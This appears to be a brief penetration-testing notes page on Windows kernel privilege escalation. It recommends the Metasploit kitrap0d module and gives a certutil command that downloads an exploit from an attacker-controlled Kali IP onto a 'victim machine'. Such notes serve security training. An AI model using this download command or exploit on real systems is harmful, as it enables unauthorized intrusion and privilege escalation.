Kernel Exploits

Kitrap0d!

SecWiki Windows Kernel Exploit DB

Kitrap0d

The metasploit module exploit/windows/local/ms10_015_kitrap0d is a really solid option for kenel exploit. When meterpreter suggester suggests it, always try it out.

A detailed writeup:

Transfer Kernel Exploits to Victim Machine

If we are doing kernel exploitation manually, compile the exploit locally and use the following command to download the exploit:

certutil -urlcache -f http://<kali_ip>/<filename> exploit.exe

It is just the Windows version of wget.

Last updated